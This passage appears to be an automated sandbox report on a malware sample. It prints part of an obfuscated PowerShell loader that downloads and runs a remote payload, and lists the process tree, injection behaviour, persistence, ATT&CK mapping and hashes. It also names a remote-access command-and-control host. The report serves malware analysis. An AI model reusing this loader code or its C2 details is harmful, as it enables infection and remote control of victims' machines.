'ADDFE0E5E2E8E8FBE5A9B4A9A1D2C8F9F9CDE6E4E8E0E7D4B3B3CAFCFBFBECE7FDCDE6E4E8E0E7A7CEECFDC8FAFAECE4EBE5E0ECFAA1A0A9F5A9DEE1ECFBECA4C6EBE3ECEAFDA9F2A9ADD6A7CEE5E6EBE8E5C8FAFAECE4EBE5F0CAE8EAE1ECA9A4C8E7EDA9ADD6A7C5E6EAE8FDE0E6E7A7DAF9E5E0FDA1ADECFFE8E5FCB1A0D2A4B8D4A7CCF8FCE8E5FAA1ADCAE6E8EDE3B9A0A9F4A0A7CEECFDDDF0F9ECA1ADCAE6E8EDE3B8A0';&($evalu7) $tomhyphens0;$tomhyphens5 = nattergal02 'ADC5FBECEBE6EEFAFAA9B4A9ADDFE0E5E2E8E8FBE5A7CEECFDC4ECFDE1E6EDA1ADCAE6E8EDE3BBA5A9D2DDF0F9ECD2D4D4A9C9A1ADCAE6E8EDE3BAA5A9ADCAE6E8EDE3BDA0A0';&($evalu7) $tomhyphens5;$tomhyphens1 = nattergal02 'FBECFDFCFBE7A9ADC5FBECEBE6EEFAFAA7C0E7FFE6E2ECA1ADE7FCE5E5A5A9C9A1D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C1E8E7EDE5ECDBECEFD4A1C7ECFEA4C6EBE3ECEAFDA9DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C1E8E7EDE5ECDBECEFA1A1C7ECFEA4C6EBE3ECEAFDA9C0E7FDD9FDFBA0A5A9A1ADDFE0E5E2E8E8FBE5A7CEECFDC4ECFDE1E6EDA1ADCAE6E8EDE3BCA0A0A7C0E7FFE6E2ECA1ADE7FCE5E5A5A9C9A1ADDDE8EDF9E6E5A0A0A0A0A5A9ADC8E5FFE6FBFAA0A0';&($evalu7) $tomhyphens1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Levne,[Parameter(Position = 1)] [Type] $prezona = [Void]);$tomhyphens2 = nattergal02 'ADC3ECFCEFE6FBA9B4A9D2C8F9F9CDE6E4E8E0E7D4B3B3CAFCFBFBECE7FDCDE6E4E8E0E7A7CDECEFE0E7ECCDF0E7E8E4E0EAC8FAFAECE4EBE5F0A1A1C7ECFEA4C6EBE3ECEAFDA9DAF0FAFDECE4A7DBECEFE5ECEAFDE0E6E7A7C8FAFAECE4EBE5F0C7E8E4ECA1ADCAE6E8EDE3B1A0A0A5A9D2DAF0FAFDECE4A7DBECEFE5ECEAFDE0E6E7A7CCE4E0FDA7C8FAFAECE4EBE5F0CBFCE0E5EDECFBC8EAEAECFAFAD4B3B3DBFCE7A0A7CDECEFE0E7ECCDF0E7E8E4E0EAC4E6EDFCE5ECA1ADCAE6E8EDE3B0A5A9ADEFE8E5FAECA0A7CDECEFE0E7ECDDF0F9ECA1ADECFFE8E5FCB9A5A9ADECFFE8E5FCB8A5A9D2DAF0FAFDECE4A7C4FCE5FDE0EAE8FAFDCDECE5ECEEE8FDECD4A0';&($evalu7) $tomhyphens2;$tomhyphens3 = nattergal02 
'ADC3ECFCEFE6FBA7CDECEFE0E7ECCAE6E7FAFDFBFCEAFDE6FBA1ADCAE6E8EDE3BFA5A9D2DAF0FAFDECE4A7DBECEFE5ECEAFDE0E6E7A7CAE8E5E5E0E7EECAE6E7FFECE7FDE0E6E7FAD4B3B3DAFDE8E7EDE8FBEDA5A9ADC5ECFFE7ECA0A7DAECFDC0E4F9E5ECE4ECE7FDE8FDE0E6E7CFE5E8EEFAA1ADCAE6E8EDE3BEA0';&($evalu7) $tomhyphens3;$tomhyphens4 = nattergal02 'ADC3ECFCEFE6FBA7CDECEFE0E7ECC4ECFDE1E6EDA1ADECFFE8E5FCBBA5A9ADECFFE8E5FCBAA5A9ADF9FBECF3E6E7E8A5A9ADC5ECFFE7ECA0A7DAECFDC0E4F9E5ECE4ECE7FDE8FDE0E6E7CFE5E8EEFAA1ADCAE6E8EDE3BEA0';&($evalu7) $tomhyphens4;$tomhyphens5 = nattergal02 'FBECFDFCFBE7A9ADC3ECFCEFE6FBA7CAFBECE8FDECDDF0F9ECA1A0';&($evalu7) $tomhyphens5 ;}$Sayable = nattergal02 'E2ECFBE7ECE5BABB';$tomhyphens6 = nattergal02 'ADCFE5E8EBECE5E5E0E7ECA9B4A9D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CEECFDCDECE5ECEEE8FDECCFE6FBCFFCE7EAFDE0E6E7D9E6E0E7FDECFBA1A1EFE2F9A9ADDAE8F0E8EBE5ECA9ADECFFE8E5FCBDA0A5A9A1CECDDDA9C9A1D2C0E7FDD9FDFBD4A5A9D2DCC0E7FDBABBD4A5A9D2DCC0E7FDBABBD4A5A9D2DCC0E7FDBABBD4A0A9A1D2C0E7FDD9FDFBD4A0A0A0';&($evalu7) $tomhyphens6;$Benthoscop = fkp $evalu5 $evalu6;$tomhyphens7 = nattergal02 'ADDAE2EEECBAA9B4A9ADCFE5E8EBECE5E5E0E7ECA7C0E7FFE6E2ECA1D2C0E7FDD9FDFBD4B3B3D3ECFBE6A5A9BFBCB0A5A9B9F1BAB9B9B9A5A9B9F1BDB9A0';&($evalu7) $tomhyphens7;$tomhyphens8 = nattergal02 'ADCBFBFCE7E0F3ECE4EAE1A9B4A9ADCFE5E8EBECE5E5E0E7ECA7C0E7FFE6E2ECA1D2C0E7FDD9FDFBD4B3B3D3ECFBE6A5A9BDBBBCB9B9B9B0BFA5A9B9F1BAB9B9B9A5A9B9F1BDA0';&($evalu7) $tomhyphens8;$nattergal01 = nattergal02 'E1FDFDF9FAB3A6A6EEE6FFFDE3E6EBEDE8F0A7E0E7A6E8EDE4E0E7A6EBFBE6E7EAE1E6FBFBE1A7EAE1E4';$nattergal00 = nattergal02 'ADC6FBEDE7A9B4A9A1C7ECFEA4C6EBE3ECEAFDA9C7ECFDA7DEECEBCAE5E0ECE7FDA0A7CDE6FEE7E5E6E8EDDAFDFBE0E7EEA1ADE7E8FDFDECFBEEE8E5B9B8A0';$tomhyphens8 = nattergal02 'ADDAE2EEECBBB4ADECE7FFB3E8F9F9EDE8FDE8';&($evalu7) $tomhyphens8;$Skge2=$Skge2+'\Maski.San';$Ordn='';if (-not(Test-Path $Skge2)) {while ($Ordn -eq '') {&($evalu7) $nattergal00;Start-Sleep 5;}Set-Content $Skge2 $Ordn;}$Ordn = Get-Content 
$Skge2;$tomhyphens9 = nattergal02 'ADFDE6E4E1F0F9E1ECE7FAA9B4A9D2DAF0FAFDECE4A7CAE6E7FFECFBFDD4B3B3CFFBE6E4CBE8FAECBFBDDAFDFBE0E7EEA1ADC6FBEDE7A0';&($evalu7) $tomhyphens9;$Ordn0 = nattergal02 'D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CAE6F9F0A1ADFDE6E4E1F0F9E1ECE7FAA5A9B9A5A9A9ADDAE2EEECBAA5A9BFBCB0A0';&($evalu7) $Ordn0;$Saadan=$tomhyphens.count-659;$Ordn1 = nattergal02 'D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CAE6F9F0A1ADFDE6E4E1F0F9E1ECE7FAA5A9BFBCB0A5A9ADCBFBFCE7E0F3ECE4EAE1A5A9ADDAE8E8EDE8E7A0';&($evalu7) $Ordn1;$Ordn2 = nattergal02 'ADCCF9E0FDE1ECE5A9B4A9D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CEECFDCDECE5ECEEE8FDECCFE6FBCFFCE7EAFDE0E6E7D9E6E0E7FDECFBA1A1EFE2F9A9ADC2FBFCE4E4ECFBE7ECBBBABEA9ADCFFBE8FFE8E5A0A5A9A1CECDDDA9C9A1D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A0A9A1D2C0E7FDD9FDFBD4A0A0A0';&($evalu7) $Ordn2;$Ordn3 = nattergal02 'ADCCF9E0FDE1ECE5A7C0E7FFE6E2ECA1ADDAE2EEECBAA5ADCBFBFCE7E0F3ECE4EAE1A5ADCBECE7FDE1E6FAEAE6F9A5B9A5B9A0';&($evalu7) $Ordn3#"
        3⤵
        • Blocklisted process makes network request
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
          4⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            5⤵
            • Modifies Installed Components in the registry
            • Enumerates connected drives
            • Checks SCSI registry key(s)
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:392
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DI2Q7U xhvnc8000.duckdns.org 8000 7CGMXO
            5⤵
              PID:3980
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4304
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2332

    Network

    MITRE ATT&CK Matrix ATT&CK v6

      • Persistence
        Registry Run Keys / Startup Folder (T1060): 2
      • Defense Evasion
        Modify Registry (T1112): 2
      • Discovery
        Query Registry (T1012): 4
        System Information Discovery (T1082): 5
        Peripheral Device Discovery (T1120): 2

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133240590696421318.txt
      Filesize

      75KB

      MD5

      65019a5db517d9fb830d8a57406a03ea

      SHA1

      817faf2ffe8461f653519e7bd96e7ee75021c891

      SHA256

      3ae88b3a99e6b785bdb44760790bc03ac722ef5b673ad5b3ca49b5cc5eecf84f

      SHA512

      bcc985d3fa48efcbb4a334b1a341a6686ef6c69f237d6d9bdcd9885696d148519ab824b9150194d783cb03189c1cc00a483f1b73ebce323f1f6a303a05b8ea62

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nauwv1b0.vhh.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/180-133-0x00000256E6200000-0x00000256E6222000-memory.dmp
      Filesize

      136KB

    • memory/180-143-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

    • memory/180-144-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

    • memory/180-145-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

    • memory/180-170-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

    • memory/180-169-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

    • memory/392-201-0x0000000002E00000-0x0000000002E01000-memory.dmp
      Filesize

      4KB

    • memory/1840-151-0x0000000005640000-0x00000000056A6000-memory.dmp
      Filesize

      408KB

    • memory/1840-148-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

    • memory/1840-152-0x0000000005720000-0x0000000005786000-memory.dmp
      Filesize

      408KB

    • memory/1840-162-0x0000000005D50000-0x0000000005D6E000-memory.dmp
      Filesize

      120KB

    • memory/1840-163-0x0000000006F20000-0x0000000006FB6000-memory.dmp
      Filesize

      600KB

    • memory/1840-164-0x0000000006260000-0x000000000627A000-memory.dmp
      Filesize

      104KB

    • memory/1840-165-0x00000000062B0000-0x00000000062D2000-memory.dmp
      Filesize

      136KB

    • memory/1840-166-0x0000000007570000-0x0000000007B14000-memory.dmp
      Filesize

      5.6MB

    • memory/1840-167-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

    • memory/1840-168-0x00000000081A0000-0x000000000881A000-memory.dmp
      Filesize

      6.5MB

    • memory/1840-149-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

    • memory/1840-147-0x0000000004FA0000-0x00000000055C8000-memory.dmp
      Filesize

      6.2MB

    • memory/1840-173-0x0000000008820000-0x000000000B0A8000-memory.dmp
      Filesize

      40.5MB

    • memory/1840-175-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

    • memory/1840-174-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

    • memory/1840-176-0x00000000070D0000-0x00000000070D1000-memory.dmp
      Filesize

      4KB

    • memory/1840-177-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

    • memory/1840-150-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
      Filesize

      136KB

    • memory/1840-146-0x0000000002430000-0x0000000002466000-memory.dmp
      Filesize

      216KB

    • memory/2332-351-0x0000029085400000-0x0000029086D2F000-memory.dmp
      Filesize

      25.2MB

    • memory/2332-212-0x00000290879A0000-0x00000290879C0000-memory.dmp
      Filesize

      128KB

    • memory/2332-210-0x0000029087590000-0x00000290875B0000-memory.dmp
      Filesize

      128KB

    • memory/2332-208-0x00000290875D0000-0x00000290875F0000-memory.dmp
      Filesize

      128KB

    • memory/3448-179-0x0000000000DC0000-0x0000000003648000-memory.dmp
      Filesize

      40.5MB

    • memory/3448-192-0x0000000022370000-0x0000000022380000-memory.dmp
      Filesize

      64KB

    • memory/3448-194-0x0000000000DC0000-0x0000000003648000-memory.dmp
      Filesize

      40.5MB

    • memory/3448-190-0x0000000022060000-0x00000000220F2000-memory.dmp
      Filesize

      584KB

    • memory/3448-189-0x0000000021F20000-0x0000000021FBC000-memory.dmp
      Filesize

      624KB

    • memory/3448-188-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

    • memory/3448-187-0x0000000000DC0000-0x0000000003648000-memory.dmp
      Filesize

      40.5MB

    • memory/3448-186-0x0000000000400000-0x000000000062B000-memory.dmp
      Filesize

      2.2MB

    • memory/3980-198-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
      Filesize

      64KB

    • memory/3980-191-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

    • memory/3980-350-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
      Filesize

      64KB